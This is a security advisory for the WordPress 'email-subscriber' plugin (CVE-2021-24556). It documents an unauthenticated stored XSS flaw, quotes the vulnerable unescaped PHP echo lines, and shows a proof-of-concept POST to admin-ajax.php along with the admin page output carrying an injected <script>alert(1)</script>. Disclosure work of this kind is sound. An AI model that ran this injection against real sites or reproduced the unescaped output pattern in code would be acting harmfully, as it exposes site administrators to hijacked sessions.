Wp Plugin Email Subscriber

Plugin Details

Plugin Name: wp-plugin : email-subscriber
Effected Version : 1.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2021-24556
Identified by : Shreya Pohekar
WPScan Reference URL

Disclosure Timeline

Technical Details

The ajax request takes in subscribe_email and subscribe_name as the post parameter and inserts it into the sql statement without properly sanitising, validating or escaping parameters. The unsanitised input gets stored in the database. When the admin user opens the subscriber list , the unsanitised stored input is loaded in table and XSS is triggerred.

Vulnerable Code: kento-email-subscribers-list.php#L61

60:               <td><a href='mailto:<?php echo $entry->email; ?>'><?php echo $entry->email; ?></a></td>  
61:                <td><?php echo $entry->name; ?></td>
62:                <td><?php echo "<span data-id='".$entry->id."' 

PoC Screenshot

PoC Screenshot


POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 117
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9
Connection: close



Response when subscriber list is loaded by admin

            <tr class=" row_id_8">
                <td><input type='checkbox' value='8' /></td>
                <td><a href='mailto:<script>alert(1)</script>'><script>alert(1)</script></a></td>  
                <td><span data-id='8' class='kento_subscribe_delete kento_subscribe_delete_8'></span>                </td>
            <tr class="alternate row_id_7">
                <td><input type='checkbox' value='7' /></td>
                <td><a href='mailto:fdg'>fdg</a></td>  
                <td><span data-id='7' class='kento_subscribe_delete kento_subscribe_delete_7'></span>                </td>
            <tr class="alternate row_id_3">